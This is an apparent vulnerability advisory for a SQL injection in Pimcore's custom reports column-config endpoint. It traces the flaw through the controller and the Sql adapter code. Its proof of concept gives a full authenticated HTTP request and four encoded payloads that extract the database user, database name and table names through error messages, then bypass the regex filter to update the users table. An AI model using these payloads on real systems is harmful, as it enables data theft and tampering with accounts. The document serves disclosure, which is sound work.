CVE-2026-44739

Summary

Affected scope

Details

• The columnConfigAction endpoint in bundles/CustomReportsBundle/src/Controller/Reports/CustomReportController.php:197 receives a configuration JSON string from the request body.
• The configuration is decoded and the first element is extracted in bundles/CustomReportsBundle/src/Controller/Reports/CustomReportController.php:207-208.
• The Sql adapter is instantiated based on the user-controlled type field in bundles/CustomReportsBundle/src/Controller/Reports/CustomReportController.php:216.
• The controller calls getColumnsWithMetadata in bundles/CustomReportsBundle/src/Controller/Reports/CustomReportController.php:217, which in turn calls getColumns in bundles/CustomReportsBundle/src/Tool/Adapter/AbstractAdapter.php:47.
• The Sql::getColumns method in bundles/CustomReportsBundle/src/Tool/Adapter/Sql.php:60 calls buildQueryString at bundles/CustomReportsBundle/src/Tool/Adapter/Sql.php:64.
• buildQueryString in bundles/CustomReportsBundle/src/Tool/Adapter/Sql.php:81 concatenates various fields from the user-provided
• configuration (like sql, from, where) directly into the SQL query string (lines 89, 100, 107).
• The constructed SQL string is checked against a weak regex in bundles/CustomReportsBundle/src/Tool/Adapter/Sql.php:67, which can be bypassed using comments (e.g. UPDATE/**/) or by using permitted SELECT statements to exfiltrate data from unauthorized tables.
• The query is executed without parameterization using $db->fetchAssociative($sql) in bundles/CustomReportsBundle/src/Tool/Adapter/Sql.php:70.
• Any resulting database exception is caught in the controller and the error message is returned in the JSON response at bundles/CustomReportsBundle/src/Controller/Reports/CustomReportController.php:234, enabling error-based exfiltration.

PoC

• Download and install the version Pimcore <=12.3.3 (latest)
• Login using Admin account or any account that has reports config permission
• Navigate to custom reports
• Capture the request using burp suite and perform SQLi attack as the following

1. Get Database username

POST /admin/bundle/customreports/custom-report/column-config HTTP/1.1
Host: localhost
Content-Length: 310
sec-ch-ua-platform: "Linux"
Accept-Language: en-US,en;q=0.9
sec-ch-ua: "Not A Brand";v="99", "Chromium";v="142"
sec-ch-ua-mobile: ?0
X-pimcore-extjs-version-minor: 0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86 64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
X-pimcore-csrf-token: 2e42012c8310823bbdbce1598bdecfd19cb5e9c4
X-pimcore-extjs-version-major: 7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/admin/
Accept-Encoding: gzip, deflate, br
Cookie: pimcore admin auth profile token=9f990b; PHPSESSID=d101f6fce4d87b8bdbbe800f9f50c82a; pc vis=3a17250fba52c657; pc ses=1774896807012; pc tss=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3NzQ4OTc1MTQuNjEwNzE3LCJwdGciOnsiX20iOjEsIl9jIjoxNzc0ODk2ODA1LCJfdSI6MTc3NDg5NzUxNCwidmk6c3J1IjpbN119LCJleHAiOjE3NzQ4OTkzMTR9.uO4iHiABylQ2KyZC0p8Li9hpgWfHnNQ01GUkbeY1Wmc; pc tvs=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3NzQ4OTc1MTQuNjExNTA4LCJwdGciOnsiY21mOnNnIjp7Ijg2MCI6Mn0sIl9jIjoxNzc0ODc2MzQyLCJfdSI6MTc3NDg5NjgwNX0sImV4cCI6MTgwNjQzMzUxNH0.mhq 2qwWzWWGruI0VNnAwgs8QzfZfbc6Za0uGn7zNYM
Connection: keep-alive

configuration=%5b%7b%22type%22%3a%22sql%22%2c%22sql%22%3a%221%20AND%20(SELECT%201%20FROM%20(SELECT(EXTRACTVALUE(1%2cCONCAT(0x7e%2c(SELECT%20user())%2c0x7e))))x)%22%2c%22from%22%3a%22object localized CAR en%22%2c%22where%22%3a%221%3d1%22%2c%22groupby%22%3a%22attributesAvailable%22%7d%5d&name=Quality Attributes

2. Get Database name

configuration=%5b%7b%22type%22%3a%22sql%22%2c%22sql%22%3a%221%20AND%20(SELECT%201%20FROM%20(SELECT(EXTRACTVALUE(1%2cCONCAT(0x7e%2c(select%2bcurrent setting(%24%24is superuser%24%24))%2c0x7e))))x)%22%2c%22from%22%3a%22object localized CAR en%22%2c%22where%22%3a%221%3d1%22%2c%22groupby%22%3a%22attributesAvailable%22%7d%5d&name=Quality Attributes

3. Get Tables names Note : Update the limit parameter to iterate around the tables queries like limit 0,1 limit 1,1 , limit 2,1 ..etc

configuration=%5b%7b%22type%22%3a%22sql%22%2c%22sql%22%3a%22(SELECT%201%20FROM%20(SELECT(EXTRACTVALUE(1%2cCONCAT(0x7e%2c(SELECT%20table name%20FROM%20information schema.tables%20WHERE%20table schema%3ddatabase()%20LIMIT%200%2c1)%2c0x7e))))x)%22%2c%22from%22%3a%22object localized CAR en%22%2c%22where%22%3a%221%3d1%22%2c%22groupby%22%3a%22attributesAvailable%22%7d%5d&name=Quality Attributes

4. Bypass the implemented Regex and perform SQL updat eto for exmaple update the admin username

configuration=%5b%7b%22type%22%3a%22sql%22%2c%22sql%22%3a%22*%22%2c%22from%22%3a%22users%22%2c%22where%22%3a%22id%3d1)%2f**%2fOR%2f**%2f1%3d1%3b%2f**%2fUPDATE%2f**%2fusers%2f**%2fSET%2f**%2fname%3d'admin'%2f**%2fWHERE%2f**%2fname%3d'admin2'%3b--%20-%22%2c%22groupby%22%3a%22attributesAvailable%22%7d%5d&name=Quality Attributes

Impact